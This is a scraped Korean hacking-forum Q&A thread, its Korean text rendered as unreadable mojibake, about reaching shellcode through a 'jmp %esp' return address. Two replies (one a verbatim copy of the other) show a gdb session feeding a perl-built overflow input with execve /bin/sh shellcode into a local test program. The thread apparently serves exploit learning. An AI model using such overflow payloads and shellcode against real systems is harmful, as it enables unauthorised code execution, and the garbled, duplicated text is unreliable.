|
|
|
|
|
|
|
|
|
|
|
|
|
1575, 1/79 |
|
lMaxl04 | |||||||
http://1111 | |||||||
ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì. | |||||||
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2006 [º¹»ç]
Hit : 1463 Date : 2022/06/29 06:05
|
|||||||
cd80 | ÀÌÇØÇϽŴë·Î ½ÇÇàµÇ´Â°Ô ¸Â½À´Ï´Ù ¾Æ·¡´Â ¿¹½ÃÀÔ´Ï´Ù (gdb) b *main+63 Breakpoint 1 at 0x80491f5 (gdb) r $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"') Starting program: /home/cd80/tmp/test $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"') Breakpoint 1, 0x080491f5 in main () (gdb) si 0x0804a008 in ?? () (gdb) x/i $pc => 0x804a008: jmp *%esp (gdb) i reg esp esp 0xffffd3f0 0xffffd3f0 (gdb) si 0xffffd3f0 in ?? () (gdb) x/i $pc => 0xffffd3f0: push $0xb (gdb) ½Ç¼ö¸¦ ÀǽÉÇغÁ¾ß ÇÒ °Í °°Àºµ¥ x/i [jmp espÁÖ¼Ò] ÇßÀ» ¶§ Á¤È®È÷ jmp *%esp ¸¸ ³ª¿À´ÂÁö¸¦ ¸ÕÀú üũÇغ¸¼Å¾ß Çϱ¸¿ä ½©ÄÚµåÀÇ ½ÃÀۺο¡´Â Àß µµ´ÞÇÏÁö¸¸ Áß°£¿¡ ¸Þ¸ð¸®¸¦ ¸Á°¡¶ß·Á Á¦´ë·Î ÀÛµ¿ÀÌ µÇÁö ¾Ê´Â°ÇÁöµµ È®ÀÎÇغ¸¼Å¾ß ÇÕ´Ï´Ù |
2022/06/30 | |
lMaxl04 | Áú¹®¿¡ ´ëÇÑ ¼³¸íÀÌ ºÎÁ·ÇÏÁø ¾Ê¾Ò³ª °ÆÁ¤Çߴµ¥ Àß ÀÌÇØÇØÁּż °¨»çÇÕ´Ï´Ù. Çϳª¾¿ ´Ù½Ã È®ÀÎÇغ¸°í½ÍÀºµ¥... ¾ÆÁ÷ ¸®¸ðÆ® ȯ°æ¿¡¼ ÁÖ¼Ò¿Í °ª È®ÀÎÇÏ´Â ¹æ¹ýÀ» Àß ¸ô¶ó Á¶±Ý ´õ °í¹ÎÇغÁ¾ß°Ú½À´Ï´Ù ¤Ð¤Ð | 2022/06/30 | |
somass | ÀÌÇØÇϽŴë·Î ½ÇÇàµÇ´Â°Ô ¸Â½À´Ï´Ù ¾Æ·¡´Â ¿¹½ÃÀÔ´Ï´Ù (gdb) b *main+63 Breakpoint 1 at 0x80491f5 (gdb) r $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"') Starting program: /home/cd80/tmp/test $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"') Breakpoint 1, 0x080491f5 in main () (gdb) si 0x0804a008 in ?? () (gdb) x/i $pc => 0x804a008: jmp *%esp (gdb) i reg esp esp 0xffffd3f0 0xffffd3f0 (gdb) si 0xffffd3f0 in ?? () (gdb) x/i $pc => 0xffffd3f0: push $0xb (gdb) ½Ç¼ö¸¦ ÀǽÉÇغÁ¾ß ÇÒ °Í °°Àºµ¥ x/i [jmp espÁÖ¼Ò] ÇßÀ» ¶§ Á¤È®È÷ jmp *%esp ¸¸ ³ª¿À´ÂÁö¸¦ ¸ÕÀú üũÇغ¸¼Å¾ß Çϱ¸¿ä ½©ÄÚµåÀÇ ½ÃÀۺο¡´Â Àß µµ´ÞÇÏÁö¸¸ Áß°£¿¡ ¸Þ¸ð¸®¸¦ ¸Á°¡¶ß·Á Á¦´ë·Î ÀÛµ¿ÀÌ µÇÁö ¾Ê´Â°ÇÁöµµ È®ÀÎÇغ¸¼Å¾ß ÇÕ´Ï´Ù |
2022/09/16 | |
|
|